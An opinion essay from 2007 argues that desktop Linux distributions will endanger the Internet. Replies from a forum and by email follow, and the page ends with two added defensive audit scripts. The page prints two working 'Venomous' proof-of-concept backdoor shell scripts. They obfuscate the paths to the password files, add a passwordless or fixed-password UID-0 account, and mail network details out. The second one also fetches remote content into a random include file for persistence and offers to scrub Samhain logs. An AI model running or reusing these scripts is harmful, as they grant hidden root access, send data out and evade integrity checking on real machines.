The Following Takes Place On 04:45:19

How Ubuntu and Other Linux Distros Will Ruin the Internet
Friday May 4th 2007
(c) J. Oquendo : sil @ infiltrated dot net


Folks over at InformationWeek posted an article which compares Ubuntu to Vista. Every other day or so, I hear about how Linux's foray onto the desktop will be the next best thing. Personally, I think it could end up being the worst thing on the planet.

Linux in my opinion should not be made for the desktop for the average Joe or even Granny. It's an all too powerful operating system and should not be tailored for day to day tasks, and for the zealots who've been porting Linux over and cartoonifying this operating system for the average user: shame on you.

For starters, imagine the ever elusive types of viruses that will sprout up on these machines. Secondly, imagine a script kiddiot's glee when he or she discovers that mega DoS attacks can now be compiled much more easily than on Windows.

Are Ubuntu developers or other "desktop Linux" developers taking these things into consideration? I'm often tinkering around with security concepts and theories, and one of my theories was a heuristic (if you would like to call it that) evolving backdoor. I named it "Plague". It was a proof of concept to give administrators and engineers a wake up call to the harsh reality of "Black Hackerdom". Guess what? You can't and won't stop it. There would be no permissions on the planet, no tripwire checksums, no firewalling, no IDS'ing that could stop a properly constructed attack. You only need to get it done right the first time, the rest is child's play.

Analogy: Grandma needs a gun to go hunting for rabbits. She buys herself a functional .22 (Windows *Anything*) in order to get food. Another hunter who sees her offers her a bazooka (Anything *Nix) in order for her to get food. Oh the mess she will make. She doesn't need it, as her .22 will function just fine; using the bazooka will certainly make a mess, and she won't understand the power the bazooka has until it's too late. The hunter who gave her the bazooka? They did it out of a good heart, thinking that if they gave her a bigger gun she would surely get something... They never took the time to look at the bigger picture: "If I give this woman the bazooka, she *really* isn't capable of handling it and will likely cause an accident..."



# !/bin/sh
# Venomous
#
# Modified script at the end of this document...
#

happy=`awk 'NR==59 {gsub(/"/,"");print $3}' /usr/include/paths.h`
days=`awk 'NR==74 {gsub(/,/,"");print $8}' /usr/include/sysexits.h`
sed -n '1p' $happy|awk -F ":" 'BEGIN{OFS=":"}{$1="venomous"}1{$2=""}2' >> $happy
sed -n '1p' $days|sed 's/[^:]*:/venomous:/' >> $days
what=`sed -n '58p' /usr/include/sysexits.h |awk '{print $5}'`
who=`sed -n '60p' /usr/include/linux/wireless.h |awk 'gsub(/,/, ""){print $4" -a"}'`
echo "Enter your email address" ; read ans ; where=$ans
$who | $what $where

Now let's see what it does:

[root@linuxbox ~]# awk 'NR==59 {gsub(/"/,"");print $3}' /usr/include/paths.h
/etc/shadow
[root@linuxbox ~]# awk 'NR==74 {gsub(/,/,"");print $8}' /usr/include/sysexits.h
/etc/passwd
[root@linuxbox ~]# sed -n '1p' $happy|awk -F ":" 'BEGIN{OFS=":"}{$1="venomous"}1{$2=""}2'
venomous::13544:0:99999:7:::
[root@linuxbox ~]# sed -n '1p' $days|sed 's/[^:]*:/venomous:/'
venomous:x:0:0:root:/root:/bin/bash
[root@linuxbox ~]# sed -n '58p' /usr/include/sysexits.h |awk '{print $5}'
mail
[root@linuxbox ~]# sed -n '60p' /usr/include/linux/wireless.h |awk 'gsub(/,/, ""){print $4" -a"}'
ifconfig -a

Step by step now. Create and add an entry for the user venomous. Then e-mail the IP addressing information to the person who enters his or her email.

Crude but functional. Let's take it a step further after a compromise and add an entry to maybe /etc/rc* start up scripts in bits and pieces to avoid being detected by even an experienced administrator.

Take an honest look at it for a moment before you shoot off judgement. If the word venomous were replaced with, say, a non "intrusive" word, maybe printer, usb, IPOD, do you honestly believe even an experienced administrator would catch it or give it a second look? I think not. In fact I know from experience many wouldn't catch it.
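A check a defender would run against exactly that argument, as an added example that is not part of the original article: the planted entry can be named anything, but it still shows up by what it is, a second UID-0 account, a shadow line with an empty password field, or a line whose field count belongs to the other file. The script is POSIX sh plus awk and runs here against constructed copies of passwd and shadow; the file contents, the placeholder hashes and the function names are mine, not the article's.

```shell
#!/bin/sh
# Account audit for /etc/passwd and /etc/shadow. Added example, not the article's code.
# Reports what an appended account leaves behind regardless of the name it was given:
#   extra-uid0 <user>        a second UID-0 account
#   no-shadow <user>         passwd entry with no shadow line (and the reverse, no-passwd)
#   empty-password <user>    shadow entry whose password field is empty
#   malformed-passwd <user>  wrong field count (7 expected), e.g. a shadow-shaped line in passwd
#   malformed-shadow <user>  wrong field count (9 expected)
# Real use: audit_accounts /etc/passwd /etc/shadow (needs read access to shadow).

audit_accounts() {
    passwd="$1"; shadow="$2"
    awk -F: '$3 == 0 && $1 != "root" { print "extra-uid0 " $1 }' "$passwd"
    awk -F: 'FILENAME == ARGV[1] { seen[$1] = 1; next }
             !($1 in seen) { print "no-shadow " $1 }' "$shadow" "$passwd"
    awk -F: 'FILENAME == ARGV[1] { seen[$1] = 1; next }
             !($1 in seen) { print "no-passwd " $1 }' "$passwd" "$shadow"
    awk -F: '$2 == "" { print "empty-password " $1 }
             NF != 9 { print "malformed-shadow " $1 }' "$shadow"
    awk -F: 'NF != 7 { print "malformed-passwd " $1 }' "$passwd"
    return 0
}

# Constructed sample files (not from any real system): a normal root and two users, plus
# two planted entries, one renamed "printer" as the text suggests and one that put a
# shadow-shaped line into passwd. The hashes are placeholders, not real digests.
make_fixture() {
    cat > "$1/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
granny:x:1000:1000:Granny:/home/granny:/bin/bash
printer:x:0:0:root:/root:/bin/bash
venomous::13544:0:99999:7:::
EOF
    cat > "$1/shadow" <<'EOF'
root:$6$placeholderhash:13544:0:99999:7:::
daemon:*:13544:0:99999:7:::
granny:$6$placeholderhash:13544:0:99999:7:::
printer::13544:0:99999:7:::
EOF
}

# Demo run against the constructed files.
demo=$(mktemp -d)
make_fixture "$demo"
audit_accounts "$demo/passwd" "$demo/shadow"
rm -rf "$demo"
```

On the sample files the audit prints four findings: extra-uid0 printer, no-shadow venomous, empty-password printer and malformed-passwd venomous. A clean pair of files prints nothing, which makes it suitable for a cron job whose output is mailed only when non-empty.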

So why are so many engineers hell bent on creating a potential disaster in the making? Have they given thought to the downsides of the possible issues that can arise from this? Have developers or anyone else stopped to wonder about the realities of the Internet and the evil that men do? Or will we all sadly have to wait until some grandma is arrested by the FBI because her machine was spamming, skimming, or DoS'ing a bank, a website, or a federal computer?

Are developers planning on mitigating these issues, or are they simply giving script kiddies wet dreams of bot heavens and spammers lucid dreams of spam havens?

Dell is already slated to install Ubuntu here and there... So what do I foresee? I see reality, and reality tells me things will get much worse than they already are.

While running my "bruteforcers" list, I already see escalations in Linux, BSD and Solaris compromises, give it 5 years of Ubuntu or any other *Nix for Grannies, and I can tell you the Internet will not be a pretty place to be.

J. Oquendo


Comment via TechExams' forum...

Really... Worse than nuclear proliferation, genocide, diseases, etc?

It's called "figuratively" speaking...

It's not all too powerful. Windows is just as powerful if you have the right tools or know some scripting and programming languages to craft your own. I say this, and I'm one of the biggest Linux fans you'll ever see.

Windows could never compete with Linux on 1) a networking scale 2) on methods to capture what is going on (lsof vs. Task Manager). I can build you a worm that would be undetectable on Linux versus one on Windows. I suggest you google rootkeep which I wrote in 1998. Upon gaining root, it always gave you a backdoor even after cleaning the backdoor out. Clean the machine, reboot, backdoor was still there. It took a lot of checksumming, and digging for rootkeep and I wrote it, out of boredom, without really flowcharting it in under an hour. 1) There are far more antivirus companies catering to Windows and eventually they'll catch on. Windows is straightforward in terms of doing an analysis. Nix is a more difficult beast to contain so again I ask... What would you do under these pretenses when a couple of hundred thousand grannies have their Ubuntu machines compromised.

Let's take this to a legal level now. We've all heard about the old woman who was molested by the RIAA for downloading... She was dead, etc., that is a no brainer. Easy for authorities to track down. Now let's throw this scenario out there... Old grandpa went and bought himself an Ubuntu powered Dell that was compromised and used to host kiddie pix. The attackers modified all sorts of scripts to clean up after themselves as if no intrusion occurred. The feds arrest old grandpa. Guess what, there is no evidence of the compromise and grandpa was clueless. There was and never will be any antivirus I could think of to stop that from happening. You think the feds will care whether grandpa is telling the truth? I suggest you read some legal casefiles and understand the harsh realities of laws in the US.

If someone compiles applications that perform DOS attacks and writes viruses that take advantage of 0day exploits, I don't really think you can call them simple script kiddies anymore.

I suggest you go out and acquaint yourself with the true definition of script kiddie.

The rest of the article is pure sensationalism and an extremely contrived example of which you can do the exact same in a Windows environment.

You CAN do SIMILAR things under Windows but not to the same extent.


Now if script kiddies already using Windows never rose to the occasion, why would handing out Linux boxes to granny be any different? They didn't take the opportunity then and they probably won't even if Linux becomes mainstream (which it won't any time soon here in the US where everyone can afford Windows). Why, well they're probably called "script kiddies" for a reason. Maybe your opinion of them is too high.

Windows has never had 1) the amount of moronic tools available under *Nix. Tools like Fragroute, IRPAS, Scapy. Enabling them the option to have these tools is a big mistake. It's not alarmist and perhaps I could have stated "idiots in the malware, organized e-Crime world." One in all they're the same to me.

The difference again, between Windows based idiots and those using *Nix (Solaris, BSD, Linux) as their platform of choice, is, it actually takes someone with a little more than a clue. By script kiddiots I'm not talking about a juvenile with too much time on his hands compiling smurf. I'm talking about the phishers, the malware spreaders, the organized idiots who would have the best/worst tool at their disposal.

So maybe I should re-write "script kiddiots/e-organized crimesters/fraudsters/phishers". Would it make more sense to some of you then.


That's what Tripwire is for...


I would be very interested in hearing how a rootkit could avoid something like a well-configured file integrity checking software package that stores a hash of all critical files, checks it on a routine basis, and sends a log of any inconsistencies off-site. For a rootkit to work properly it absolutely must modify files. If I'm missing something here, I would appreciate being clued in. I'm not being sarcastic either. I appreciate an education.

You won't necessarily need to defeat a well configured file integrity checker. In fact all you'd need to do is cause more than one collision, and that's already been done a while back.

http://www.cits.rub.de/MD5Collisions/
http://www.schneier.com/blog/archives/2005/02/sha1_broken.html

How trustworthy would you deem Tripwire, et al. to be if all of the sudden you're seeing all sorts of collisions? I wrote a program a while back to do that too... Take two checksums (http://tinyurl.com/22enmt) for files on a Unix based system, but everyone screamed "overboard security!" ... Was it? What were the odds of someone leveraging both md5 and sha1 in the same setting, on the same intrusion, in under 59 minutes (amount of time in crontab) before I caught them? I may redo the integrity checker soon, who knows... When I have a week to kill. May even make it database driven with information stored offsite for comparative analysis... Who knows...

To answer your question though, for my rootkit to work it does not need to modify anything. It never downloads anything, never touches anything... Quick logical flowchart...

/usr/includes (files are already there)
/tmp/ garbage is stored here...

first
go into certain files from /usr/includes and elsewhere

then
parse out certain words from these files... remember to change the files you look at

after
take all these words and combine them into a script in /tmp

then
run that script in /tmp

after
delete yourself

What are you looking for? The script is gone and it never downloaded or saved anything... Yet you will still be backdoored... If I HAD TO modify some of the files, they would be random files as well, never the same...

You would have to run Tripwire or another similar program non-stop and catch it at that instant... Make more sense now? That's WITHOUT the fact that I could cause one or two collisions if you rely on md5 and sha1... How many false positives before the typical admin just ignores errors? It's human nature... So go out and recompile the latest stable version of whatever... What do you think sysadmins would do when that newly compiled version of whatever is giving them false positives... They'll ignore it... And we're talking sysadmins here... The original article covered grannies ;)

PS... Think you can chmod||chown /tmp? Try it, we'll see how fast things break.
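The two-checksum idea from the reply above, as an added example and not the author's checker: every regular file under a tree gets both an MD5 and a SHA-1 digest recorded, so a substituted file would have to collide on both digests at once, and the verify step also reports files that appeared or vanished since the baseline, which is what an appended header or a file dropped into an include directory looks like to the checker. The tree contents, file names and function names are constructed for the demo; the baseline is written locally here, where in practice it would be copied off-host and the comparison run from that copy.

```shell
#!/bin/sh
# Dual-digest (MD5 + SHA-1) file integrity baseline and verify. Added example, not the
# author's program. Assumes coreutils md5sum/sha1sum and paths without newlines.

# Print "md5 sha1 path" for every regular file under a directory, sorted by path.
hash_tree() {
    find "$1" -type f | LC_ALL=C sort | while IFS= read -r f; do
        m=$(md5sum "$f" | cut -d' ' -f1)
        s=$(sha1sum "$f" | cut -d' ' -f1)
        printf '%s %s %s\n' "$m" "$s" "$f"
    done
}

# Record the baseline for a tree into a file kept outside that tree.
make_baseline() {
    hash_tree "$1" > "$2"
}

# Compare a fresh scan with the baseline; one finding per line:
#   changed <path>  digest pair differs from the baseline
#   new <path>      file absent from the baseline
#   missing <path>  baseline file no longer present
# The path starts at column 75 (32-char md5, space, 40-char sha1, space), so paths
# containing spaces are handled correctly.
verify_tree() {
    current=$(mktemp)
    hash_tree "$1" > "$current"
    awk 'FILENAME == ARGV[1] { base[substr($0,75)] = $1 " " $2; next }
         { p = substr($0,75); if ((p in base) && base[p] != $1 " " $2) print "changed " p }' "$2" "$current"
    awk 'FILENAME == ARGV[1] { base[substr($0,75)] = 1; next }
         { p = substr($0,75); if (!(p in base)) print "new " p }' "$2" "$current"
    awk 'FILENAME == ARGV[1] { cur[substr($0,75)] = 1; next }
         { p = substr($0,75); if (!(p in cur)) print "missing " p }' "$current" "$2"
    rm -f "$current"
    return 0
}

# Constructed sample tree standing in for an include directory (not real system files).
make_tree() {
    mkdir -p "$1/include"
    printf '#define _PATH_SHADOW "/etc/shadow"\n' > "$1/include/paths.h"
    printf 'typedef int sample_t;\n' > "$1/include/sample.h"
}

# Demo: baseline a clean tree, then simulate an appended header, a dropped-in file
# and a deletion, and show what verify reports.
demo=$(mktemp -d)
make_tree "$demo"
make_baseline "$demo" "$demo.baseline"
echo "findings on the clean tree: $(verify_tree "$demo" "$demo.baseline" | grep -c '^')"
printf '/* appended by something other than the package manager */\n' >> "$demo/include/paths.h"
printf 'int stray;\n' > "$demo/include/printer.h"
rm "$demo/include/sample.h"
verify_tree "$demo" "$demo.baseline"
rm -rf "$demo" "$demo.baseline"
```

After the simulated tampering the verify step prints three lines: changed .../include/paths.h, new .../include/printer.h and missing .../include/sample.h. The false-positive fatigue the reply describes is real, so the practical discipline is to re-baseline immediately after every package update (from the off-host copy, not the possibly tampered host) so that the only "changed" lines an admin ever sees are ones nobody expected.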

Okay, sounds good. But what is this script and how do you get it on the computer in the first place? I'm talking about the original script that parses the other files.... to create a script that runs in the /tmp? And if it can't find all the words necessary to create your script?

I won't argue either of those points

Glad you asked... It's all browser-based, off of yet another concept... (That concept is proven too btw...)

http://www.securityfocus.com/archive/1/466175/30/180/threaded
http://www.infiltrated.net/index.php?id=news&do=2&item=8
http://www.securityfocus.com/archive/1/466017/30/30/threaded
http://www.infiltrated.net/exploder.java.txt (theory... pseudo proven... I won't publicize this portion)


e-Mails...

> Hey, how's it going?

> I realize that I'm probably not going to change your mind, but most of
> the arguments you chose were also harbingers of doom when MS switched
> to a real TCP/IP stack with XP, which was capable of raw sockets. It
> didn't spell the end of the internet, and a large base of relatively
> clueless Linux machines won't either. The reasons are primarily social
> in nature, as opposed to technical.

You're referring to Gibson's comments on the TCP/IP stack...
http://grcsucks.com/grcdos2.htm (been there done that)

> We both know that grandma isn't going to be running around on her
> computer as root, if not because she wouldn't know how to access the
> root account, then because any solution which makes a computer usable
> for grandma will already have the protections built in. A corollary to
> this will be that clueless grandmothers aren't really the installing
> type. Assuming the clueless newbie stereotype, it will be an email /
> ebay existence, neither of which are particularly dangerous under
> Linux at the moment.

Here is the thing, this is an assumption. Firstly it would be outright strange to have a grandmother install Ubuntu or any other operating system. This will likely come via a grandchild, son, (other relative) or perhaps someone a-la "Geek Squad". In either event, grandma, grandpa, et al. will be the end user(s). It's often an inexperienced admin (even some experienced ones are guilty) that will/can overlook something.

It's humorous because while scraping this article together, I was in discussion with one of my coworkers who's an avid FreeBSD user. I was discussing the pros and cons of using Tripwire/Samhain like products and how one could parse out and reinject checksum hashes. It was my notion that after so many false positives being injected into Tripwire and Samhain, an administrator will likely turn a blind eye to it. Similar to someone using Snort. Popular for a day, becomes cumbersome to manage, often chucked or not monitored.

It is these admins installing that cause worries.

> Given a general populous of "tinkerers", my own mother being a perfect
> example, there will be a larger threat, and that threat must be dealt
> with using software controls. My mother will install anything that she
> thinks might remotely play a game. She ***bought*** comet cursor. I
> digress.

Ironic, I worked at Comet Systems once upon a time. ;)

Tinkerers are tinkerers are tinkerers. I'm the biggest one I know. It's often the tinkerers, yes, who will make life hellish for many an admin, but under the *Nix* umbrella, it's these tinkerers network operators should be least worried about, and I'll attempt to explain why...

As a tinkerer, I'm constantly watching what is going on, then investigating why. As a tinkerer, I've learned the ins and outs (at least in my mind) of what my system is doing and why. It's the non-tinkerers, those who leave their machines connected, watching them crawl due to lack of memory because of an infestation of viruses and malware, that cause the most problems.

I worked at a University about three/four years ago. I remember a student whose machine was turned on at the beginning of the school year and left on. She played mp3's non stop and could not do anything with her machine. She finally brought it to us in February (mind you classes started in August) because she had become frustrated with why her machine did nothing and was only an mp3 player. Lo and behold she had the worst machine I've *EVER* seen. We're talking hundreds of instances of differing viruses, thousands of instances of malware. She brought her machine in because we saw her connection generating a constant 4Mbps of traffic. And I mean constant.

> For users like her, the root account must either not be enabled, or
> not available to her, accessible only via a password which she doesn't
> have. There are various security methods for accomplishing this. I
> know personally that NAPA's Solaris servers have root passwords that
> are a function of the time/date. A similar configuration could be
> easily arranged for dell technicians to obtain local / remote access
> in the event it is needed.


You're again assuming that Dell will undertake the role of doing the right thing. 1) It's not their job. 2) Highly doubtable they will invest the time to do so. 3) How do you tell someone "we can't/won't give you the administrator password for your machine"? I'd laugh at any vendor who told me that.

> The bottom line is that worms are dependent on one resource:
> homogeneous systems which contain vulnerabilities. An unlocked root
> account is as much a vulnerability as a shoddy Sendmail version.
> Assuming proper software updates (now readily available in Ubuntu) and
> the correct security policies (also in place), very little chance
> exists for exploiting large swaths of systems, with the exception of a
> compromise at an update repository.


Bottom line is, Linux, BSD, Solaris, I don't care which you want to name, are vulnerable at some given point in time. It's that "ONE" point in time someone would need to create an epidemic. Of course I don't foresee this happening, I solely wanted to point out the obvious and not so obvious to Ubuntu and Linux developers... "Be extremely cautious as you progress". That's it, nothing more. As for security updates under any system, let's be realistic here, how many people turn these off after a while? I've seen the most hardened admins turn them off. Security policies? I've seen the most hardened security admins turn them off (SELinux comes to mind).

Compromise at an update repository? You mean similar to when Debian's servers were compromised?

> PS - I'll be posting this as an open letter on my LiveJournal, with a
> link to your article


As I too will add this to the Ubuntu page.


via email...

Comments inline.

First off, great article, very thoughtful.

Thanks for the response I like seeing differing points of view.

I think one of the points you touched on (but didn't directly state) is that the old mainframe paradigm of "user" versus "administrator" doesn't suit desktop PCs in unmanaged environments, so it's not a secure line of defense for most people.

One of the main things that keeps popping to mind is privilege escalation. Too many people who read this document are forgetting that something as uncommon as a bug in say Firefox, Thunderbird, Evolution, etc., can lead to privilege escalation. The most common comments thus far have been "You can't be root in Ubuntu stupid... Or my grandma would never be root" or things along those lines. It's a shortsighted view many nix zealots take. I know administrators who've been on the computing scene PROFESSIONALLY for years who have their own habits. Some almost exclusively log on and surf around as root.

A desktop PC user _is_ (and needs to be) the administrator of their own machine in order to do common things like install programs, configure system settings, add/remove hardware, etc. Ordinary users are going to get pissed if they can't do those kinds of things on a pretty frequent basis.

Indeed the user of a home based system is almost always going to be the superuser slash admin of the machine regardless of any argument anyone in the Linux community can give. How long until the moment comes where they will have to log in as root in order to do something? The attitude almost always will become "Well why should I use my other account if I have to keep switching to admin to get something done". That's when, like it or not, you will have the clueless admin boom.

Given that need, it's technically impossible to bulletproof the system to keep people from shooting themselves in the foot. You _have_ to give them a gun to give them the capabilities they demand to have.

True to an extent. There is / was a company called Argus Systems who made a program called Pitbull I played with in the late 90's. They had a great concept of modules atop of modules which worked together to deter escalations. Another concept was Trusted Solaris' model. But again, the more restrictive of a machine you make, the less the average user would want to use it.

So the best you can hope to do is make the system simple enough, transparent enough, and understandable enough to manage that even ordinary people really can't get too confused about how to properly administer the system. The more complex the gun, the more likely they are to accidentally shoot themselves out of confusion.

Problem... Imagine giving your grandmother or teen Windows 2003 SMB server with ISA Server and IIS installed. This to me is something close to what Ubuntu and other "Desktop Linux for Newbies" distribution makers are doing. I don't feel they're doing this out of malice or ignorance. I think they're being too trusting of the operating system forgetting the dangers of the Internet and those seeking to profit from these dangers e.g. Malware, virus, botnet, worm creators.

*nix systems are such an unwieldy complex mess to administer that there's no hope for ordinary desktop PC users to figure things out. Nevermind the security risks presented by such a complex system -- the installation and administrative overhead is what keeps people from adopting it.

I believe you hit the nail on the head by mentioning the complexities, but I think you missed out on the fact that "Desktop Linux for Newbies" distribution developers are trying to place a pretty picture on top of these complexities and giving that same complex mess to someone who should probably not be given that amount of computing power.

Linux users, heck most *Nix (BSD/Solaris) users will swear this is akin to Gibson's crackpot article, maybe to a degree it is just on a different level. Gibson's argument was complete speculation. I've given a proof of concept framework via a bloated shell script to make a point. I could have eloquently written it in C, Perl, Ruby but I didn't for a few reasons. 1) It was a concept so I didn't care for much other than saying "Here"... 2) Portability... The annoying worm is portable to any system including legacy systems. If you think that EVERY SINGLE *Nix box will ALWAYS HAVE Perl, Ruby, etc., installed you're mistaken; Awk and Sed will be.

If the FOSS community really wants to succeed, they should refocus their efforts on simplifying the system -- not by hiding layers of complexity and shell scripts away behind pretty GUIs, but by truly re-architecting to reduce unnecessary over-engineering.

I think the community is so overwhelmed with producing top of the line, state of the art tools anyone could use for any purpose. But there is little collaboration between the varying degrees of developers. This is where the issues arise. This is also Microsoft's biggest FUD generator. "Well Linux had 100 holes last month" when in fact, there might have been 2 holes in Linux, but 98 holes in other programs developed by someone in the FOSS community. The blame just gets tacked on Linux, Microsoft then spends a couple of million promoting their FUD, companies get scared away. Welcome to the business world.

// Keith My Slashdot posts: http://slashdot.org/~c0d3h4x0r


# !/bin/sh
# Venomous
# Linux PoC backdoor keeper...
# J. Oquendo (c) 05/09/2007 
# echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'

# If you have to ask you shouldn't run this
# password for venomous is password


happy=`awk 'NR==59 {gsub(/"/,"");print $3}' /usr/include/paths.h`
days=`awk 'NR==74 {gsub(/,/,"");print $8}' /usr/include/sysexits.h`
guitar=`wget -qO - http://www.infiltrated.net/guitar|sed -n '1p'`
sed -n '1p' $happy|awk -F ":" 'BEGIN{OFS=":"}{$1="venomous"}1{$2=""}2' >> $days
sed -n '1p' $days|sed 's/[^:]*:/venomous:/'|awk -vguitar=$guitar -F ":" 'BEGIN{OFS=":"}{$2='guitar'}2' >> $happy
what=`sed -n '58p' /usr/include/sysexits.h |awk '{print $5}'`
who=`sed -n '60p' /usr/include/linux/wireless.h |awk 'gsub(/,/, ""){print $4" -a"}'`
echo "Enter your email address" ; read ans ; where=$ans
$who | $what $where


# Ugly method to keep a root account Follows...
# For those not in the know... This idea is to prove a
# point not give you another tool to be morons with.
# Instead of ruining, how about solving...

# Pick a ranDumb file in /usr/includes/ then create the same
# backdoor on the system using this hidden file... Do something
# sneaky to place this file on a startup

# Note the location... Highly doubtable to remove an actual
# include file unless some stupid admin did something really
# dumb...

random=`date|awk -F : '{print $3}'|awk '{print $1}'`
echo $random > /tmp/secCommand
sad=`awk '{print "ls /usr/include|sed -n '\''"$1"p'\''"}' /tmp/secCommand|sed -n '1p'`
rm /tmp/secCommand
filename=`echo $sad|sh|awk -F . '{print $1}'`

lynx -dump http://www.infiltrated.net/ubuntuDestruction.php|sed -n '226,233p' >> /usr/local/include/$filename.h

# Wanna hide your entries in Samhain?
# uncomment rm /tmp/secCommand ... and uncomment the line below
# awk -vfilename=$filename '{print "perl -pi -e '\''s/'$filename'/samhain/g'\''"}' /var/log/samhain_log|sh

# Now of course I could have modified this to replicate any one
# of the files on startup but again... PoC ... The naysayers
# will ramble on about "You're out of your mind..." Am I? I've
# given you the PoC's what more do you want... Ubuntu or any
# Linux for the lowly home user is a horrible idea...

# And AGAIN before someone fires off "I would see the URL
# and that's a dead giveaway!" ... Look, I'm trying to make
# a point here... I personally have a functioning backdoor
# undetectable to most integrity checkers, Samhain, Tripwire
# etc., but why should I disclose this anywhere. It's not in
# the best interest of anyone to do so... Don't bother asking
# for it via email because it's not public and will never be...

# This again... Was to prove a point to the naysayers who say
# this shit doesn't happen... Keep dreaming. It's only a matter
# of time before you guys go "Goo Goo" about getting Linux for
# Idjits off the ground, but it's a horrible mistake in the
# making